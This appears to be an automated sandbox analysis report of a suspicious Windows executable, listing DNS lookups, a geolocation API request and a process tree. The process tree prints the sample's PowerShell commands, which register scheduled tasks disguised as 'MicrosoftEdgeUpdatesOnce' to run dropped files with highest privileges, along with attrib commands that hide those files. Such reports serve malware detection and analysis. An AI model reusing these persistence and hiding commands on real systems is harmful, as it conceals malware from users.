                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.110150099 CET1.1.1.1192.168.2.40x5e94No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.110150099 CET1.1.1.1192.168.2.40x5e94No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250217915 CET1.1.1.1192.168.2.40xd037No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250217915 CET1.1.1.1192.168.2.40xd037No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.250535011 CET1.1.1.1192.168.2.40x69a9No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.343636990 CET1.1.1.1192.168.2.40xcea6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.343636990 CET1.1.1.1192.168.2.40xcea6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483345032 CET1.1.1.1192.168.2.40x999eNo error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483427048 CET1.1.1.1192.168.2.40xcce3No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.483427048 CET1.1.1.1192.168.2.40xcce3No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.560326099 CET1.1.1.1192.168.2.40xd562No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.560326099 CET1.1.1.1192.168.2.40xd562No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.18A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.15A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET1.1.1.1192.168.2.40x1819No error (0)api.company-target.com108.139.79.76A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.865436077 CET1.1.1.1192.168.2.40xa73eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.865436077 CET1.1.1.1192.168.2.40xa73eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:05.887739897 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:07.079199076 CET1.1.1.1192.168.2.40x46b2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:07.079199076 CET1.1.1.1192.168.2.40x46b2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      • https:
                                                                                                                        • api.company-target.com
Session ID | Source IP   | Source Port | Destination IP | Destination Port
0          | 192.168.2.4 | 50227       | 108.139.79.18  | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-29 12:41:06 UTC | 789 | OUT | GET /api/v3/ip.json?key=7D8lsDsuK7OQCqWFQDi6VqJjwaKomm62lkY5XEyw&referrer=&page=https%3A%2F%2Fwww.microsoft.com%2Fen-us%2Fwindows%2Fwindows-10-specifications&title=Check%20Windows%2010%20System%20Requirements%20%26%20Specs%20%7C%20Microsoft HTTP/1.1
                                                                                                                      Host: api.company-target.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Origin: https://www.microsoft.com
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Referer: https://www.microsoft.com/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-12-29 12:41:07 UTC | 1031 | IN | HTTP/1.1 200 OK
                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                      Content-Length: 482
                                                                                                                      Connection: close
                                                                                                                      Date: Sun, 29 Dec 2024 12:41:06 GMT
                                                                                                                      Request-ID: 47e9caee-f4f6-420c-8934-eb25f834ea36
                                                                                                                      Server: nginx
                                                                                                                      Access-Control-Allow-Origin: https://www.microsoft.com
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: x-amz-cf-id
                                                                                                                      Access-Control-Max-Age: 7200
                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Api-Version: v3
                                                                                                                      Identification-Source: CENTRAL
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Sat, 28 Dec 2024 12:41:06 GMT
                                                                                                                      Vary: Accept-Encoding, Origin
                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                      Via: 1.1 54f388662c0be6cc8275058896dbbae6.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: DXB53-P1
                                                                                                                      X-Amz-Cf-Id: Sw1VGxc_7iW7JIsYjbiZHsvElD1dmqqsmNC9rbfS28cUT8R5F138aQ==
2024-12-29 12:41:07 UTC | 482 | IN | Data Ascii: {"region_name":"New York","registry_dma_code":501,"registry_country_code3":null,"registry_company_name":"CenturyLink Communications LLC","registry_city":"New York City","registry_state":"NY","registry_zip_code":"10001","registry_area_code":null,"registry_

Target ID: 0
Start time: 07:38:56
Start date: 29/12/2024
Path: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Imagebase: 0x7ff7a6730000
File size: 38'135'059 bytes
MD5 hash: 477D3B9EE775C048F96B450DD00BA490
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 07:38:57
Start date: 29/12/2024
Path: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Imagebase: 0x7ff7a6730000
File size: 38'135'059 bytes
MD5 hash: 477D3B9EE775C048F96B450DD00BA490
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 07:38:59
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:38:59
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:39:01
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 07:39:01
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                      Target ID:6
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\LineInst.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:07:39:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\WinHex.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:07:39:02
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff617380000
                                                                                                                      File size:23'040 bytes
                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:07:39:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\LineInst.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../LineInst.exe
                                                                                                                      Imagebase:0xa70000
                                                                                                                      File size:19'463'448 bytes
                                                                                                                      MD5 hash:AA2AD37BB74C05A49417E3D2F1BD89CE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:12
                                                                                                                      Start time:07:39:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\WinHex.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../WinHex.exe
                                                                                                                      Imagebase:0x7ff7c5bd0000
                                                                                                                      File size:19'293'911 bytes
                                                                                                                      MD5 hash:EFDC5DBA52333C0F5EEEDB0308FBE2D0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:13
                                                                                                                      Start time:07:39:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
                                                                                                                      Imagebase:0x4c0000
                                                                                                                      File size:699'192 bytes
                                                                                                                      MD5 hash:A5D94F9587F97E9C674447447721B77F
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Has exited:false

                                                                                                                      Target ID:14
                                                                                                                      Start time:07:39:10
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\vdsldr.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                      Imagebase:0x7ff61c4e0000
                                                                                                                      File size:27'136 bytes
                                                                                                                      MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:07:39:11
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\WinHex.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\../WinHex.exe
                                                                                                                      Imagebase:0x7ff7c5bd0000
                                                                                                                      File size:19'293'911 bytes
                                                                                                                      MD5 hash:EFDC5DBA52333C0F5EEEDB0308FBE2D0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:17
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:18
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:19
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff6577f0000
                                                                                                                      File size:5'387'223 bytes
                                                                                                                      MD5 hash:6BDDA8BA15F8F472FE7D065689E7D35D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Target ID:20
                                                                                                                      Start time:07:39:14
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff6577f0000
                                                                                                                      File size:5'387'223 bytes
                                                                                                                      MD5 hash:6BDDA8BA15F8F472FE7D065689E7D35D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:07:39:16
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:07:39:16
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:07:39:16
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:07:39:22
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:07:39:23
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:07:39:23
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:07:39:30
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:07:39:30
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:07:39:30
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:07:39:35
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:07:39:35
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f330000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:07:39:35
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:07:39:41
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:07:39:41
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:07:39:41
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:07:39:45
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:07:39:45
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:07:39:45
Start date:29/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:07:39:51
Start date:29/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Imagebase:0x7ff70dbc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:42
                                                                                                                      Start time:07:39:51
                                                                                                                      Start date:29/12/2024
